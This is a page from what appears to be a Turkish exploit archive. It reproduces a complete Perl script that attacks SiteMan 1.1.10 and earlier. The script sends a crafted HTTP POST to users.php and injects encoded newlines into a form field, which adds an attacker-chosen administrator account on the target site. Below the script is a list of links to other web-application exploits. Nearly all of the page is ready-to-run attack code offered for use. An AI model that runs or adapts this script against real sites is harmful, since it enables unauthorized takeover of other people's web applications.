Exploit / Web Apps Exploit / Siteman <= 1.1.10 Remote Administrative Account Addition Exploit

Eklenme Tarihi: 2008-10-20 22:59
#!/usr/bin/perl -w
#
# Exploit by Noam Rathaus - Beyond Security Ltd.
# Exploit for the SiteMan vulnerability discovered by: "amironline452" <amironline452@alphahackers.com>
#

use Digest::MD5 qw(md5 md5_hex md5_base64);
use IO::Socket;
use strict;


# ./siteman.pl / vulnerable.host
my $Path = shift;
my $Host = shift;
my $Username = shift;
my $Password = md5_hex(shift);

print "Path: $Path\nHost: $Host\nUsername: $Username\nPassword: $Password\n";

my $content = "do=docreate&amp;line=%0A%0D$Username|$Password|5|$Username\@hacked.com|". "$Username|1105956827|$Username|$Password|0|0|0|hackers%0A%0D";

my $request = "POST $Path/users.php HTTP/1.1\r
Host: $Host\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040928 Firefox/0.9.3\r
Accept: text/html;q=0.9,text/plain;q=0.8,*/*;q=0.5\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Content-Length: ".length($content)."\r
Content-Type: application/x-www-form-urlencoded\r
Connection: close\r
\r
$content";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $Host, PeerPort => "8080");

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";

print "request: [$request]\n";
print $remote $request. "\r\n";

while (<$remote>)
{
print $_;
}

close ($remote);

print "\n\n--- done ---\n";

Yorumlar:

  1. Henüz Yorum Eklenmedi

Yorum Ekle



Keywords:




Benzer Sayfalar (Similar Pages):

Bulunamadı. (not found)

Bu Sayfalarda İlginizi Çekebilir (The Links Bellow May Attract You As Well):
Exploit / Web Apps Exploit / Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit / Web Apps Exploit / PHP-Nuke 7.4 Remote Privilege Escalation
Exploit / Web Apps Exploit / TorrentTrader 1.0 RC2 SQL Injection Exploit
Exploit / Web Apps Exploit / phpMyWebhosting SQL Injection Exploit
Exploit / Web Apps Exploit / PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.5 SQL Injection password disclosure Exploit
Exploit / Web Apps Exploit / Fastgraf's whois.cgi Remote Command Execution Exploit
Exploit / Web Apps Exploit / Poll It CGI v2.0 exploit
Exploit / Web Apps Exploit / CMScore SQL Injection Exploit
Exploit / Web Apps Exploit / MyPHP Forum 1.0 SQL Injection Exploit
Exploit / Web Apps Exploit / PostNuke PostWrap Module Remote Exploit
Exploit / Web Apps Exploit / PerlDesk 1.x SQL-Injection Exploit
Exploit / Web Apps Exploit / LiteForum 2.1.1 sql injection exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / ITA Forum <= 1.49 SQL Injection Exploit
Exploit / Web Apps Exploit / e107 include() Remote Exploit
Exploit / Web Apps Exploit / phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit / Web Apps Exploit / Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit / Web Apps Exploit / GFHost PHP GMail Remote Command Execution Exploit
Exploit / Web Apps Exploit / TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit / Web Apps Exploit / UBB.threads 6.2.*-6.3.* one char bruteforce exploit
Exploit / Web Apps Exploit / ocPortal 1.0.3 Remote File Inclusion
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version2)
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version)
Exploit / Web Apps Exploit / PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'downloads.php' mod Remote Exploit